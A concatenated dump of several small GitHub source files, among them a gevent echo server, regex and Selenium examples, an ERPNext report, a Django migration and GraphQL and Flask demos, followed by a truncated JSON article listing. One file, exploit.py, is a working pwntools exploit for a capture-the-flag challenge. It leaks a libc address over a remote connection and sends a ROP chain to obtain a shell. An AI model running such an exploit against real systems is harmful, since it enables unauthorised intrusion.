40d3ecc084fb675cd69f19242f2558e09bd2b098
|
[] |
no_license
|
liuluyang/openstack_mogan_study
|
dab0a8f918ffd17e0a747715998e81304672b75b
|
8624f765da7f5aa0c210f0fa945fc50cf8a67b9e
|
refs/heads/master
| 2021-01-19T17:03:15.370323 | 2018-04-12T09:50:38 | 2018-04-12T09:50:38 | 101,040,396 | 1 | 1 | null | 2017-11-01T02:17:31 | 2017-08-22T08:30:22 |
Python
|
UTF-8
|
Python
| false | false | 872 |
py
|
#coding:utf8
import gevent
from gevent import monkey,socket
monkey.patch_all() #有IO才做时需要这一句
s = socket.socket(2,1) #用的都是gevent模块中的socket,但用法一样
#s.setsockopt(1,2,1)
s.bind(('',8080))
s.listen(1024)
print 'listening ...8080'
def func_accept():
while 1:
cs,userinfo = s.accept()
print('来了一个客户'+str(userinfo))
g = gevent.spawn(func_recv,cs) #每当有用户连接,增加一条协程
def func_recv(cs):
try:
while 1:
recv_data = cs.recv(1024)
print(recv_data) #程谁堵塞了,便会跳转至其他协程
if len(recv_data) > 0:
cs.send(recv_data)
else:
cs.close()
break
except:
print cs,'is cut connection'
#g1 = gevent.spawn(func_accept)
#g1.join()
func_accept()
|
[
"[email protected]"
] | |
d0215f9d1c50b64bf0a063ec2baf631dfe83758c
|
2b4790d77439d89ad27bdd04bac539283f0dd605
|
/cookbook/chapter2/2.7_shortest_match.py
|
49bb54fd123247134a394ad7b475f5859077f171
|
[] |
no_license
|
ajioy/python-ex
|
9fde4bcfe35edeee5050365660a03bdb6b913da1
|
982a3cdf0de0e140faa4cb539f2961b311de2c2a
|
refs/heads/master
| 2020-04-05T14:06:09.909935 | 2018-08-14T14:43:55 | 2018-08-14T14:43:55 | 59,105,033 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 334 |
py
|
import re
str_pat = re.compile(r'\"(.*)\"')
text1 = 'Computer says "no."'
print(str_pat.findall(text1))
text2 = 'Computer says "no." Phone says "yes."'
# 贪婪模式匹配,尽可能长的匹配
print(str_pat.findall(text2))
# 非贪婪匹,尽可能短的匹配
str_pat = re.compile(r'\"(.*?)\"')
print(str_pat.findall(text2))
|
[
"[email protected]"
] | |
383e36a92c9d5637fc3a45dc325ed151ff97d399
|
8d24fedcadec55acb90aa6eb98d2768a9edf9dba
|
/professional_browser_automation/elements/element.py
|
7d307b17a1d410c53ece73603d055d3403e09961
|
[
"Unlicense"
] |
permissive
|
ikostan/ElegantBrowserAutomationWithPythonAndSelenium
|
bb0a839b775e0a4f6c51b9d8ff1b07cab1624409
|
da087036d74a8fbaec3a2875dad5c45c2a85689c
|
refs/heads/master
| 2020-06-24T12:28:38.152860 | 2019-07-29T06:35:29 | 2019-07-29T06:35:29 | 198,962,805 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 662 |
py
|
import selenium
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class Element:
def __init__(self, driver: selenium.webdriver, locator: tuple):
self._driver = driver
self._locator = locator
self._element = self._find()
def _find(self):
'''
Returns element if located else raises TimeOut exception
:return:
'''
return WebDriverWait(self._driver, 10).until(EC.presence_of_element_located(self._locator))
@property
def element(self):
return self._element
@property
def driver(self):
return self._driver
@property
def locator(self):
return self._locator
|
[
"[email protected]"
] | |
33a3d15ea5ee1796400d25807404e08938591741
|
83cb1b60faf90982aad32c5979856d6064c00e5b
|
/infra_validation_engine/utils/__init__.py
|
3d7325c5de65d3772012e362ee86b426687bffe2
|
[
"Apache-2.0"
] |
permissive
|
boris-vasilev/simple_grid_infra_validation_engine
|
25813b3bfa3f82c8bc964b4ac43089a4fea76015
|
66a1410ca42718d559fd12e1e99dbcbc64457645
|
refs/heads/master
| 2020-09-06T00:58:51.032918 | 2019-10-25T15:24:24 | 2019-10-25T15:24:24 | 220,265,468 | 0 | 0 |
Apache-2.0
| 2019-11-07T15:14:21 | 2019-11-07T15:14:20 | null |
UTF-8
|
Python
| false | false | 386 |
py
|
def get_lightweight_component_hosts(augmented_site_level_config):
site_infrastructure = augmented_site_level_config['site_infrastructure']
output = []
for node in site_infrastructure:
node['host'] = "ssh://{fqdn}".format(fqdn=node['fqdn'])
output.append(node)
return output
def get_augmented_site_level_config_file(augmented_site_level_config):
pass
|
[
"[email protected]"
] | |
a0af2852cda9a3447ca5115c38f0c38ee2d71b59
|
b815438a597af24018277788200caf5da7c4a611
|
/Python/Compare-the-Triplets.py
|
958faa07f309af0d695639b148fd045d20c1b8ba
|
[] |
no_license
|
Zahidsqldba07/HackeRank-1
|
0338fe204074a544b8f2510ba6702fc0f648e5e7
|
14a04e72d1599a4b8375623781a952dde323acaa
|
refs/heads/master
| 2023-04-23T10:38:05.993784 | 2020-11-01T17:23:49 | 2020-11-01T17:23:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,160 |
py
|
"""
Alice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, awarding points on a scale from 1 to 100
for three categories: problem clarity, originality, and difficulty.
We define the rating for Alice's challenge to be the triplet a = (a[0],a[1],a[2]), and the rating for Bob's challenge to be the triplet
b = (b[0],b[1],b[2]).
Your task is to find their comparison points by comparing a[0] with b[0], a[1] with b[1],and a[2] with b[2].
If a[i] > b[i] ,then Alice is awarded point.
If a[i] < b[i] ,then Bob is awarded point.
If a[i] = b[i] ,then neither person receives a point.
Comparison points is the total points a person earned.
Given a and b, determine their respective comparison points.
Function Description
Complete the function compareTriplets in the editor below. It must return an array of two integers, the first being Alice's score
and the second being Bob's.
compareTriplets has the following parameter(s):
a: an array of integers representing Alice's challenge rating
b: an array of integers representing Bob's challenge rating
Input Format
The first line contains 3 space-separated integers a[0], a[1] and, a[2] describing the respective values in triplet a.
The second line contains 3 space-separated integers b[0], b[1] and, b[2] describing the respective values in triplet b.
Output Format
Return an array of two integers denoting the respective comparison points earned by Alice and Bob.
Sample Input 0
5 6 7
3 6 10
Sample Output 0
1 1
Sample Input 1
17 28 30
99 16 8
Sample Output 1
2 1
"""
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the compareTriplets function below.
def compareTriplets(a, b):
alice,bob =0,0
for i in range(3):
if a[i] > b[i]:
alice += 1
elif a[i] < b[i]:
bob += 1
return [alice,bob]
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
a = list(map(int, input().rstrip().split()))
b = list(map(int, input().rstrip().split()))
result = compareTriplets(a, b)
fptr.write(' '.join(map(str, result)))
fptr.write('\n')
fptr.close()
|
[
"[email protected]"
] | |
a8f7bb875473b5cc4537aa57b46d6f71ae1d2a84
|
9f3981ecd73bd45178013d441a1ef34f860def0b
|
/pos_bahrain/pos_bahrain/report/stock_balance_with_prices/stock_balance_with_prices.py
|
e773fbb9ebeb694178e7719130e9d7ba526b7a73
|
[
"MIT"
] |
permissive
|
azhkhn/pos_bahrain
|
6e139bf02489c298ad8ac963b52ef676515e84f5
|
eae06abb8eb4a9c4465b02178dd981a8ea430511
|
refs/heads/master
| 2020-09-17T07:00:51.068742 | 2019-11-16T09:28:43 | 2019-11-16T09:28:43 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,437 |
py
|
# Copyright (c) 2013, 9t9it and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from functools import partial
from toolz import concatv, compose, valmap, merge
from pos_bahrain.utils import key_by, mapf, filterf
def execute(filters=None):
from erpnext.stock.report.stock_balance.stock_balance import execute
columns, data = execute(filters)
prices = {
"buying": frappe.db.get_single_value("Buying Settings", "buying_price_list"),
"selling": frappe.db.get_single_value("Selling Settings", "selling_price_list"),
}
return _get_columns(columns, prices), _get_data(data, prices, filters)
def _get_columns(columns, prices):
return list(
concatv(
columns[:2],
[
{
"fieldname": "supplier",
"fieldtype": "Link",
"width": 100,
"label": "Supplier",
"options": "Supplier",
}
],
columns[2:7],
[
{
"fieldname": "buying_price",
"fieldtype": "Currency",
"width": 100,
"label": prices.get("buying"),
},
{
"fieldname": "selling_price",
"fieldtype": "Currency",
"width": 100,
"label": prices.get("selling"),
},
],
columns[7:],
)
)
def _get_data(data, prices, filters):
get_query_by_item_code = compose(
partial(valmap, lambda x: x.get("value")),
partial(key_by, "item_code"),
lambda x: frappe.db.sql(
x,
values=merge({"item_codes": mapf(lambda x: x[0], data)}, prices),
as_dict=1,
),
)
price_query = """
SELECT
ip.item_code AS item_code,
ip.price_list_rate AS value
FROM `tabItem Price` AS ip
LEFT JOIN `tabItem` AS i ON i.name = ip.item_code
WHERE
ip.price_list = %({price})s AND
ip.item_code IN %(item_codes)s AND
IFNULL(ip.uom, '') IN ('', i.stock_uom)
"""
suppliers_by_item_code = get_query_by_item_code(
"""
SELECT
parent AS item_code,
default_supplier AS value
FROM `tabItem Default`
WHERE parent in %(item_codes)s
"""
)
buying_prices_by_item_code = get_query_by_item_code(
price_query.format(price="buying")
)
selling_prices_by_item_code = get_query_by_item_code(
price_query.format(price="selling")
)
def add_fields(row):
item_code = row[0]
return list(
concatv(
row[:2],
[suppliers_by_item_code.get(item_code)],
row[2:7],
[
buying_prices_by_item_code.get(item_code),
selling_prices_by_item_code.get(item_code),
],
row[7:],
)
)
def filter_by_supplier(row):
if not filters.supplier:
return True
return filters.supplier == row[2]
make_data = compose(partial(filterf, filter_by_supplier), partial(map, add_fields))
return make_data(data)
|
[
"[email protected]"
] | |
40b52f45132e2e3030aae2cd04ce2496b8e8a52c
|
76995eda52f3d8b7310ff53fc9b5f8b9ea00287a
|
/hello world.py
|
43b4393dd19e59377c38451746abce7b31c05adc
|
[] |
no_license
|
tonybelair922/demo_YT
|
7bcf3573bb4ae2bdf34d615a5aecd40a48211faf
|
e748bd33878699f886928449b7926baa11356383
|
refs/heads/main
| 2023-03-13T09:59:14.937299 | 2021-03-08T07:44:33 | 2021-03-08T07:44:33 | 326,244,329 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,645 |
py
|
"""
msg= " Hello world"
for x in range(16):
print(msg)
"""
def my_function():
for x in range(6):
print("Hello from a function")
my_function()
{
"version" : "3.0",
"user" : "internal-api-beta-user",
"dateGenerated" : "2016-12-23T15:24:07Z",
"status" : "OK",
"data" : [ {
"parameter" : "t_2m:C",
"coordinates" : [ {
"lat" : 50,
"lon" : 10,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : -1.18699,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : -2.58338,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 0.0499817,
} ]
}, {
"lat" : 40,
"lon" : 20,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : -0.186987,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : -0.0833496,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 1.04998,
} ]
} ]
}, {
"parameter" : "relative_humidity_2m:p",
"coordinates" : [ {
"lat" : 50,
"lon" : 10,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : 98.0471,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : 94.6451,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 96.7655,
} ]
}, {
"lat" : 40,
"lon" : 20,
"dates" : [ {
"date" : "2016-12-20T00:00:00Z",
"value" : 77.4957,
}, {
"date" : "2016-12-21T00:00:00Z",
"value" : 78.3308,
}, {
"date" : "2016-12-22T00:00:00Z",
"value" : 64.9726,
} ]
} ]
} ]
}
|
[
"[email protected]"
] | |
cd48574c9c58a59d8434aa039fe557ccc7bf88f9
|
0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a
|
/python3/16_Web_Services/e_GraphQL/creating/a_graphene/e_input_object_types.py
|
409fed8fe1a59002922ab86d2f343886941285b2
|
[] |
no_license
|
udhayprakash/PythonMaterial
|
3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156
|
e72f44e147141ebc9bf9ec126b70a5fcdbfbd076
|
refs/heads/develop
| 2023-07-08T21:07:33.154577 | 2023-07-03T10:53:25 | 2023-07-03T10:53:25 | 73,196,374 | 8 | 5 | null | 2023-05-26T09:59:17 | 2016-11-08T14:55:51 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 677 |
py
|
import graphene
class Person(graphene.ObjectType):
name = graphene.String()
age = graphene.Int()
class PersonInput(graphene.InputObjectType):
name = graphene.String()
age = graphene.Int()
class Mutation(graphene.ObjectType):
create_person = graphene.Field(Person, input=PersonInput())
def resolve_create_person(self, info, input):
return Person(name=input.name, age=input.age)
schema = graphene.Schema(mutation=Mutation)
mutation = """
mutation {
createPerson(input: { name: "John Doe", age: 30 }) {
name
age
}
}
"""
result = schema.execute(mutation)
print(result.data["createPerson"])
|
[
"[email protected]"
] | |
27a81b2c84baeca740e1eb28aeb702ae4cfe4214
|
30c8dd5f094fa486b006d5c558aba25e64486398
|
/serv4.py
|
ae07520d05c98ff50c16029501b715aca5877c55
|
[] |
no_license
|
badillosoft/iot-b
|
9942b2501ebb0457b2bd5a3c69855706bce6d486
|
4f608a2b808e4fb9476a73e513664082f34d58ce
|
refs/heads/master
| 2020-03-31T03:59:13.947614 | 2018-10-07T00:05:28 | 2018-10-07T00:05:28 | 151,886,825 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 313 |
py
|
# -*- coding: utf-8 -*-
from flask import Flask
import os
app = Flask(__name__)
@app.route("/saludar")
def saludar():
return "Hola"
@app.route("/ultra")
def ultra():
stream = os.popen("python ultrasonico_html.py")
return stream.read()
app.run(host="192.168.100.48")
#http://192.168.100.48:5000/saludar
|
[
"[email protected]"
] | |
5584ee69c15cd5aacd051f6f1e7bfd3f031a0c37
|
8e23cbf08a8c5d966f642ef89a25309392acdb36
|
/python教学/装饰器.py
|
e6b6e1325f7f6353583cdae58f87ff140bebf4a3
|
[] |
no_license
|
gyhd/python_study
|
ba94eca3aa391c56cdb34a48bcb6cd32581703e0
|
3b8c99179903d9c81b70d65c8df3023449394f57
|
refs/heads/master
| 2022-11-27T18:00:20.259082 | 2020-07-11T09:49:10 | 2020-07-11T09:49:10 | 248,500,662 | 3 | 1 | null | 2022-11-22T05:08:17 | 2020-03-19T12:44:35 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,499 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 29 15:48:22 2019
@author: Maibenben
"""
"""
def use_logging(func):
def wrapper(*args,**kwargs):
kwarg_values=[i for i in kwarg_values()]
for arg in list(args) + kwarg_values:
if not isinstance(arg,int):
return print('wrong input')
return func(*args,**kwargs)
return wrapper
@use_logging
def foo(a,b):
return (a+b)
foo(5,1)
"""
import hello
print('I am python')
class Foo(object):
def __init__(self,func):
self.func=func
def __call__(self):
print("%s is running"%self.func)
self.func()
print("%s is end"%self.func)
@Foo
def bar():
print('bar')
bar()
class people:
def __init__(self,n,a):
self.__name=n
self.__age=a
@property
def age(self):
return print(self.__age)
@age.setter
def age(self,age):
self.__age=age
def speak(self):
print("%s says: I am %d years old"%(self.__name,self.__age))
#调用实例
p=people('fiona',20)
p.age=50
p.speak()
class A(object):
bar=1
def func1(self):
print('foo')
@classmethod
def func2(cls):
print('func2')
print(cls.bar)
cls().func1() #调用 foo 方法
A.func2() #不需要实例化
class C(object):
@staticmethod
def f():
print('fiona')
C.f() #静态方法无需实例化
a=C()
a.f() #也可以实例化后调用
|
[
"[email protected]"
] | |
855b7ea3ed9f6b80d4674bf06c86a849cf414ce6
|
45b4687f1a9bc885666c06ea2c6b105e5058a7ae
|
/pyavrutils/examples/usage_ard.py
|
15cb144b0f5e90d4f551e9711bed305552c40885
|
[
"BSD-2-Clause"
] |
permissive
|
ponty/pyavrutils
|
5e14e0d2275235d87ed5668b632b16d0ea05711d
|
460ae240b1360241e6867684300bd5f9a23b057b
|
refs/heads/master
| 2020-12-24T16:06:55.990646 | 2020-05-02T09:00:26 | 2020-05-02T09:00:26 | 2,108,946 | 10 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 569 |
py
|
from entrypoint2 import entrypoint
code = '''
from pyavrutils import Arduino
cc = Arduino(board='mini')
cc.build('void setup(){};void loop(){}')
cc.output
cc.size()
cc.size().program_bytes
cc.board='pro'
cc.build('void setup(){};void loop(){}')
cc.output
cc.size().program_bytes
cc.warnings
'''
@entrypoint
def main():
for line in code.strip().splitlines():
print('>>> %s' % line)
try:
s = eval(line)
if s:
print(s)
except SyntaxError:
exec(line)
|
[
"ponty@home"
] |
ponty@home
|
1024e3e86e782595371ff6d7a72d2c358bef7c38
|
8096e140f0fd38b9492e0fcf307990b1a5bfc3dd
|
/Python/madlibs/version1.py
|
030da60671377a43b1498010dbff0898eb122bb7
|
[] |
no_license
|
perennialAutodidact/PDXCodeGuild_Projects
|
0cacd44499c0bdc0c157555fe5466df6d8eb09b6
|
28a8258eba41e1fe6c135f54b230436ea7d28678
|
refs/heads/master
| 2022-11-15T22:26:45.775550 | 2020-07-07T17:13:01 | 2020-07-07T17:13:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 794 |
py
|
print("\nPlease enter: \n")
adjective_1 = input("Adjective: ")
place = input("Place: ")
plural_noun = input("Plural noun: ")
adjective_2 = input("Adjective: ")
adjective_3 = input("Adjective: ")
verb_1 = input("\"ing\" verb: ")
verb_2 = input("\"ing\" verb: ")
adjective_4 = input("Adjective: ")
adjective_5 = input("Adjective: ")
noun_1 = input("Noun: ")
f"If you go to some {adjective_1} place like {place} , you must know how to deal with wild animals such as bears, wolves and{plural_noun} . The most important of these is the bear. There are three kinds of bear, the grizzly bear, the {adjective_2} bear and the {adjective_3} bear. Bears spend most of their time {verb_1} or {verb_2} . They look very {adjective_4} , but if you make them {adjective_5} , they might bite your {noun_1} ."
|
[
"[email protected]"
] | |
980e1ccc875d26d9d2310924a4cf756d9eb52c42
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/07-RemoteLibcId/247ctf_non-exectuable-stack/exploit.py
|
8ae0a1385c0478c8df203b33d8d459ef768279ff
|
[] |
no_license
|
KurSh/remenissions_test
|
626daf6e923459b44b82521aa4cb944aad0dbced
|
9dec8085b62a446f7562adfeccf70f8bfcdbb738
|
refs/heads/master
| 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 889 |
py
|
#!/usr/bin/env python3
from pwn import *
import os
import sf
import sys
import signal
target = remote("042f9172aa4814e7.247ctf.com", 50384)
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x2c)
rop_chain = [134513552, 134513981, 134520856]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
target.recvline()
target.recvline()
leak = target.recv(4)
puts_address = u32(leak)
libc_base = puts_address - (422752)
print("libc base is: %s" % hex(libc_base))
bof_payload = sf.BufferOverflow(arch = 32)
bof_payload.add_base("libc", libc_base)
bof_payload.set_input_start(0x2c)
rop_chain = [[249104, 'libc'], b'0000', [1554639, 'libc']]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
time.sleep(.5)
target.interactive()
|
[
"[email protected]"
] | |
5a9e2337774edfa2d38ae948f760275231a69469
|
41311e8bbed80e1f819157d24d7943c05ba6b2e6
|
/quiz/p1-1.py
|
6904090c9c4d88daefea5beda24e62a30c34efb8
|
[] |
no_license
|
tanglan2009/MITx6.00.2x_Introductin_Computational_Thinking_and_Data_Science
|
c0bb39cb0964014661823e1301f05af7837ff3c5
|
334726fca7f87eae55f5f45c3cdc4dbac02cfac4
|
refs/heads/master
| 2021-01-10T02:49:34.663406 | 2016-03-06T19:49:44 | 2016-03-06T19:49:44 | 53,272,724 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 136 |
py
|
import random
def f(x):
# x is an integer
return int(x + random.choice([0.25, 0.5, 0.75]))
print f(1)
print f(2)
print f(3)
|
[
"[email protected]"
] | |
c020c2f69a1976edb765483dd834de041a8b2bb9
|
3ae29d8aa791c03e9a09eb07a83a1eaf49772fb6
|
/restaurant/migrations/0019_auto__del_rating.py
|
a4af116d7a5caeba246a44a2461a5fd07f2f124c
|
[] |
no_license
|
rif/click2eat
|
26ca011288b1d4f9d69c0e8ecd36fcd622eb5d0c
|
1a6894a46e8bf49edfb9c16e50d925e6354ddc6a
|
refs/heads/master
| 2020-07-11T22:47:15.756006 | 2012-05-15T16:15:22 | 2012-05-15T16:15:22 | 204,658,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,928 |
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'Rating'
db.delete_table('restaurant_rating')
def backwards(self, orm):
# Adding model 'Rating'
db.create_table('restaurant_rating', (
('delivery_time', self.gf('django.db.models.fields.SmallIntegerField')()),
('feedback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('restaurant', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['restaurant.Unit'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('quality', self.gf('django.db.models.fields.SmallIntegerField')()),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('restaurant', ['Rating'])
models = {
'restaurant.communication': {
'Meta': {'object_name': 'Communication'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'restaurant.currency': {
'Meta': {'object_name': 'Currency'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'restaurant.deliverytype': {
'Meta': {'object_name': 'DeliveryType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.FloatField', [], {})
},
'restaurant.employee': {
'Meta': {'object_name': 'Employee'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
'restaurant.interval': {
'Meta': {'object_name': 'Interval'},
'end_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Schedule']"}),
'start_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'weekdays': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '13'})
},
'restaurant.partnerpackage': {
'Meta': {'object_name': 'PartnerPackage'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'restaurant.paymentmethod': {
'Meta': {'object_name': 'PaymentMethod'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'restaurant.schedule': {
'Meta': {'object_name': 'Schedule'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unit': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['restaurant.Unit']", 'unique': 'True'})
},
'restaurant.unit': {
'Meta': {'object_name': 'Unit'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'admin_users': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'communication': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.Communication']", 'symmetrical': 'False'}),
'contact_person': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'units_using_this'", 'to': "orm['restaurant.Currency']"}),
'delivery_range': ('django.db.models.fields.FloatField', [], {}),
'delivery_time': ('django.db.models.fields.IntegerField', [], {}),
'delivery_time_user': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'delivery_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.DeliveryType']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Employee']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {}),
'logo_path': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {}),
'minimum_ord_val': ('django.db.models.fields.IntegerField', [], {}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'overall_discount': ('django.db.models.fields.FloatField', [], {}),
'package': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.PartnerPackage']"}),
'payment_method': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.PaymentMethod']", 'symmetrical': 'False'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'})
}
}
complete_apps = ['restaurant']
|
[
"[email protected]"
] | |
f392ac0672bb07b6422d2d0b1428717eff6cc3b4
|
b22b0760b29d24cff24eda9d1c114094fd1a588f
|
/Python/Easy/1002. Find Common Characters.py
|
31ed0092f8a82223904bdc350b72986f3fbb5b1f
|
[] |
no_license
|
MridulGangwar/Leetcode-Solutions
|
bbbaa06058a7b3e7621fc54050e344c06a256080
|
d41b1bbd762030733fa271316f19724d43072cd7
|
refs/heads/master
| 2022-03-07T12:20:33.485573 | 2022-02-21T07:22:38 | 2022-02-21T07:22:38 | 231,700,258 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 906 |
py
|
class Solution(object):
def commonChars(self, A):
"""
:type A: List[str]
:rtype: List[str]
"""
init_d ={}
for i in A[0]:
if i not in init_d:
init_d[i]=1
else: init_d[i]+=1
for i in range(1,len(A)):
temp={}
for char in A[i]:
if char not in temp and char in init_d:
temp[char]=1
elif char in temp and char in init_d:
temp[char]+=1
for i in init_d.keys():
if i not in temp:
del init_d[i]
else:
init_d[i] = min(init_d[i],temp[i])
result=[]
for key in init_d.keys():
for i in range(init_d[key]):
result.append(key)
return result
|
[
"[email protected]"
] | |
8870f715f7c1f62386ba321b2c3fff4410c3772b
|
aac418419c2ef4d10c5c4ceb607d3d8329a5f395
|
/Accepted/Codeshef/CATSDOGS - Cats_and_Dogs.py
|
b212a7af8376b88d41f5fa6d86ecea05063d1eb3
|
[] |
no_license
|
sudhirshahu51/projects
|
bb13395227355ff84933b6d3a0f158ee42bcdceb
|
b2d8331d14d2163b20535368a60c81f6c8bc2c8f
|
refs/heads/master
| 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 529 |
py
|
# Code Chef Cats and Dogs problem
t = int(input()) # No. of test cases
while t:
cats, dogs, legs = map(int, input().split())
high = (cats + dogs) * 4 # when all the cats and dogs legs are touching ground
if (cats - (2 * dogs)) <= 0:
low = (dogs * 4) # only dogs legs are touching ground
else:
low = (cats - dogs) * 4 # cats no. are greater than twice of dogs
if legs % 4 == 0 and low <= legs <= high:
print('yes')
else:
print('no')
t -= 1
|
[
"[email protected]"
] | |
074c7250d576b20673e7c68a4de9e26a9df9037f
|
3d7039903da398ae128e43c7d8c9662fda77fbdf
|
/database/CSS/juejin_1312.py
|
2d36b3449d0f0513687328d1a4612401e5b4a267
|
[] |
no_license
|
ChenYongChang1/spider_study
|
a9aa22e6ed986193bf546bb567712876c7be5e15
|
fe5fbc1a5562ff19c70351303997d3df3af690db
|
refs/heads/master
| 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 70,289 |
py
|
{"err_no": 0, "err_msg": "success", "data": [{"article_id": "6844904202922098701", "article_info": {"article_id": "6844904202922098701", "user_id": "1855631356860685", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/6/30/173049ee163d1e93~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "css3 javascript 单行和多行文本溢出截断多种方案", "brief_content": "在我们日常开发中的时候经常会遇到一种业务场景,需要截断一些文字的显示。可能是一行或者两行,或者根据字数限制或者用户的显示屏幕大小来展示对应的文字。 响应式截断,当文本溢出的时候才显示省略号。 用伪元素模拟省略号,兼容性较好,但是展示有部分问题,可能需要结合部分 javascri…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1593510303", "mtime": "1611443179", "rtime": "1593513254", "draft_id": "6845076843935055885", "view_count": 1837, "collect_count": 21, "digg_count": 6, "comment_count": 1, "hot_index": 98, 